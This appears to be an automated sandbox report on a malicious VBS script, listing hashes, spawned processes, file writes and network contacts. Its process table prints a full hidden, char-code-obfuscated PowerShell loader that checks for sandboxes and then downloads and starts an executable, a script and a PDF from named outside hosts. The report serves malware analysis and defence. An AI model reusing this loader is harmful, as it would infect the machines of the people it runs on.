Field | Value |
---|---|
File name: | IT299491460719147094788931329368.vbs |
Full analysis: | https://app.any.run/tasks/2446a0d7-5518-43c9-acff-b76e2f532951 |
Verdict: | Malicious activity |
Analysis date: | April 15, 2019, 10:18:44 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with CRLF, LF line terminators |
MD5: | BE2037637040347BBC876417A1A76BE5 |
SHA1: | 2D0825923FD21D650173C3E36C3D3800C2905E56 |
SHA256: | E54AA8C3D986C37FF2F22CA546A5A6552B3FCFF5D563B685EF2934846B6DA49F |
SSDEEP: | 384:ISWGhznuudJj/Hy1RSP0q8Gr4uF20zsRcJrII+Wwa1pgvZGN/9CE:3ZPT |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2680 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\IT299491460719147094788931329368.vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
1092 | powershell -WindowStyle Hidden -Command $a='';105,102,40,32,40,40,71,101,116,45,85,73,67,117,108,116,117,114,101,41,46,78,97,109,101,32,45,109,97,116,99,104,32,39,82,85,124,85,65,124,66,89,124,67,78,39,41,32,45,111,114,32,40,40,71,101,116,45,87,109,105,79,98,106,101,99,116,32,45,99,108,97,115,115,32,87,105,110,51,50,95,67,111,109,112,117,116,101,114,83,121,115,116,101,109,32,45,80,114,111,112,101,114,116,121,32,77,111,100,101,108,41,46,77,111,100,101,108,32,45,109,97,116,99,104,32,39,86,105,114,116,117,97,108,66,111,120,124,86,77,119,97,114,101,124,75,86,77,39,41,32,41,123,32,101,120,105,116,59,32,125,59,36,106,115,105,118,98,106,32,61,32,91,83,121,115,116,101,109,46,73,79,46,80,97,116,104,93,58,58,71,101,116,84,101,109,112,80,97,116,104,40,41,59,36,98,97,116,122,32,61,32,74,111,105,110,45,80,97,116,104,32,36,106,115,105,118,98,106,32,39,74,117,99,104,101,99,107,120,54,52,46,101,120,101,39,59,36,106,122,120,117,97,32,61,32,39,104,116,116,112,58,47,47,105,116,46,101,109,101,114,97,108,100,115,117,114,102,115,99,105,101,110,99,101,115,46,105,110,102,111,47,97,112,105,63,119,103,101,105,39,59,36,120,105,98,104,105,32,61,32,74,111,105,110,45,80,97,116,104,32,36,106,115,105,118,98,106,32,39,83,101,97,114,99,104,73,51,50,46,106,115,39,59,36,120,122,121,97,32,61,32,39,104,116,116,112,58,47,47,105,109,103,46,101,115,115,45,105,100,46,99,111,109,47,108,50,46,112,104,112,63,118,105,100,61,112,101,99,55,39,59,36,121,106,115,117,117,32,61,32,74,111,105,110,45,80,97,116,104,32,36,106,115,105,118,98,106,32,39,99,118,101,100,117,46,112,100,102,39,59,36,102,103,100,116,32,61,32,39,104,116,116,112,58,47,47,105,109,103,46,101,115,115,45,105,100,46,99,111,109,47,108,50,46,112,104,112,63,118,105,100,61,112,101,99,55,39,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,102,103,100,116,44,36,120,105,98,104,105,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,120,105,98,104,105,59,125,99,97,116,99,104,123,125,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,106,122,120,117,97,44,36,98,97,116,122,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,98,97,116,122,59,125,99,97,116,99,104,123,125,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,120,122,121,97,44,36,121,106,115,117,117,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,121,106,115,117,117,59,125,99,97,116,99,104,123,125,59|%{$a+=[char]$_};iex $a; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2660 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command $a='';105,102,40,32,40,40,71,101,116,45,85,73,67,117,108,116,117,114,101,41,46,78,97,109,101,32,45,109,97,116,99,104,32,39,82,85,124,85,65,124,66,89,124,67,78,39,41,32,45,111,114,32,40,40,71,101,116,45,87,109,105,79,98,106,101,99,116,32,45,99,108,97,115,115,32,87,105,110,51,50,95,67,111,109,112,117,116,101,114,83,121,115,116,101,109,32,45,80,114,111,112,101,114,116,121,32,77,111,100,101,108,41,46,77,111,100,101,108,32,45,109,97,116,99,104,32,39,86,105,114,116,117,97,108,66,111,120,124,86,77,119,97,114,101,124,75,86,77,39,41,32,41,123,32,101,120,105,116,59,32,125,59,36,106,115,105,118,98,106,32,61,32,91,83,121,115,116,101,109,46,73,79,46,80,97,116,104,93,58,58,71,101,116,84,101,109,112,80,97,116,104,40,41,59,36,98,97,116,122,32,61,32,74,111,105,110,45,80,97,116,104,32,36,106,115,105,118,98,106,32,39,74,117,99,104,101,99,107,120,54,52,46,101,120,101,39,59,36,106,122,120,117,97,32,61,32,39,104,116,116,112,58,47,47,105,116,46,101,109,101,114,97,108,100,115,117,114,102,115,99,105,101,110,99,101,115,46,105,110,102,111,47,97,112,105,63,119,103,101,105,39,59,36,120,105,98,104,105,32,61,32,74,111,105,110,45,80,97,116,104,32,36,106,115,105,118,98,106,32,39,83,101,97,114,99,104,73,51,50,46,106,115,39,59,36,120,122,121,97,32,61,32,39,104,116,116,112,58,47,47,105,109,103,46,101,115,115,45,105,100,46,99,111,109,47,108,50,46,112,104,112,63,118,105,100,61,112,101,99,55,39,59,36,121,106,115,117,117,32,61,32,74,111,105,110,45,80,97,116,104,32,36,106,115,105,118,98,106,32,39,99,118,101,100,117,46,112,100,102,39,59,36,102,103,100,116,32,61,32,39,104,116,116,112,58,47,47,105,109,103,46,101,115,115,45,105,100,46,99,111,109,47,108,50,46,112,104,112,63,118,105,100,61,112,101,99,55,39,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,102,103,100,116,44,36,120,105,98,104,105,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,120,105,98,104,105,59,125,99,97,116,99,104,123,125,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,106,122,120,117,97,44,36,98,97,116,122,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,98,97,116,122,59,125,99,97,116,99,104,123,125,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,120,122,121,97,44,36,121,106,115,117,117,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,121,106,115,117,117,59,125,99,97,116,99,104,123,125,59|%{$a+=[char]$_};iex $a; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2808 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: NTVDM.EXE Exit code: 3221225477 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1652 | "C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\admin\AppData\Local\Temp\cvedu.pdf" | C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | | powershell.exe |
User: admin Company: Adobe Systems Incorporated Integrity Level: MEDIUM Description: Adobe Acrobat Reader DC Version: 15.23.20070.215641 | ||||
3440 | "C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --type=renderer "C:\Users\admin\AppData\Local\Temp\cvedu.pdf" | C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | — | AcroRd32.exe |
User: admin Company: Adobe Systems Incorporated Integrity Level: LOW Description: Adobe Acrobat Reader DC Version: 15.23.20070.215641 | ||||
2240 | "C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16448250 | C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | — | AcroRd32.exe |
User: admin Company: Adobe Systems Incorporated Integrity Level: MEDIUM Description: Adobe RdrCEF Version: 15.23.20053.211670 | ||||
2860 | "C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-3d-apis --disable-databases --disable-direct-npapi-requests --disable-file-system --disable-notifications --disable-shared-workers --disable-direct-write --lang=en-US --lang=en-US --log-severity=disable --product-version="ReaderServices/15.23.20053 Chrome/45.0.2454.85" --device-scale-factor=1 --enable-delegated-renderer --num-raster-threads=2 --gpu-rasterization-msaa-sample-count=8 --content-image-texture-target=3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel="2240.0.1635227101\2069600459" --allow-no-sandbox-job /prefetch:673131151 | C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | — | RdrCEF.exe |
User: admin Company: Adobe Systems Incorporated Integrity Level: LOW Description: Adobe RdrCEF Version: 15.23.20053.211670 | ||||
2148 | "C:\Windows\system32\ntvdm.exe" -i2 | C:\Windows\system32\ntvdm.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: NTVDM.EXE Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1360 | "C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\admin\AppData\Local\Temp\cvedu.pdf" | C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | — | powershell.exe |
User: admin Company: Adobe Systems Incorporated Integrity Level: MEDIUM Description: Adobe Acrobat Reader DC Exit code: 1 Version: 15.23.20070.215641 | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
1092 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5LI3S550LO0SQS9217J0.temp | — | |
MD5:— | SHA256:— | |||
2660 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6SE7WLE88IJALD1DUJNN.temp | — | |
MD5:— | SHA256:— | |||
2808 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs691C.tmp | — | |
MD5:— | SHA256:— | |||
2808 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs691D.tmp | — | |
MD5:— | SHA256:— | |||
3440 | AcroRd32.exe | C:\Users\admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal | — | |
MD5:— | SHA256:— | |||
3440 | AcroRd32.exe | C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt16.lst.3440 | — | |
MD5:— | SHA256:— | |||
3440 | AcroRd32.exe | C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\AdobeFnt16.lst.3440 | — | |
MD5:— | SHA256:— | |||
3440 | AcroRd32.exe | C:\Users\admin\AppData\Local\Temp\acrord32_sbx\A9R189rto1_1o4tw27_2nk.tmp | — | |
MD5:— | SHA256:— | |||
3440 | AcroRd32.exe | C:\Users\admin\AppData\Local\Temp\acrord32_sbx\A9R48gdg9_1o4tw28_2nk.tmp | — | |
MD5:— | SHA256:— | |||
3440 | AcroRd32.exe | C:\Users\admin\AppData\Local\Temp\acrord32_sbx\A9Rktc6lg_1o4tw29_2nk.tmp | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1652 | AcroRd32.exe | GET | 304 | 2.16.186.33:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/279_15_23_20070.zip | unknown | — | — | whitelisted |
1652 | AcroRd32.exe | GET | 304 | 2.16.186.33:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/message.zip | unknown | — | — | whitelisted |
1652 | AcroRd32.exe | GET | 304 | 2.16.186.33:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/281_15_23_20070.zip | unknown | — | — | whitelisted |
1652 | AcroRd32.exe | GET | 304 | 2.16.186.33:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/280_15_23_20070.zip | unknown | — | — | whitelisted |
2660 | powershell.exe | GET | 200 | 185.158.249.151:80 | http://it.emeraldsurfsciences.info/api?wgei | NL | text | 4 b | suspicious |
1652 | AcroRd32.exe | GET | 304 | 2.16.186.33:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/277_15_23_20070.zip | unknown | — | — | whitelisted |
1092 | powershell.exe | GET | 200 | 185.158.249.151:80 | http://it.emeraldsurfsciences.info/api?wgei | NL | text | 4 b | suspicious |
2660 | powershell.exe | GET | 200 | 185.158.251.243:80 | http://img.ess-id.com/l2.php?vid=pec7 | NL | text | 18.0 Kb | malicious |
1092 | powershell.exe | GET | 200 | 185.158.251.243:80 | http://img.ess-id.com/l2.php?vid=pec7 | NL | text | 17.3 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1092 | powershell.exe | 185.158.251.243:80 | img.ess-id.com | 23media GmbH | NL | suspicious |
2660 | powershell.exe | 185.158.249.151:80 | it.emeraldsurfsciences.info | easystores GmbH | NL | suspicious |
1652 | AcroRd32.exe | 2.16.186.33:80 | acroipm2.adobe.com | Akamai International B.V. | — | whitelisted |
2660 | powershell.exe | 185.158.251.243:80 | img.ess-id.com | 23media GmbH | NL | suspicious |
1092 | powershell.exe | 185.158.249.151:80 | it.emeraldsurfsciences.info | easystores GmbH | NL | suspicious |
1652 | AcroRd32.exe | 2.18.233.74:443 | armmf.adobe.com | Akamai International B.V. | — | whitelisted |
— | — | 2.18.233.74:443 | armmf.adobe.com | Akamai International B.V. | — | whitelisted |
— | — | 23.58.217.61:443 | ardownload2.adobe.com | Akamai Technologies, Inc. | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
img.ess-id.com | 185.158.251.243 | malicious |
it.emeraldsurfsciences.info | 185.158.249.151 | suspicious |
armmf.adobe.com | 2.18.233.74 | whitelisted |
acroipm2.adobe.com | 2.16.186.33 | whitelisted |
ardownload2.adobe.com | 23.58.217.61 | whitelisted |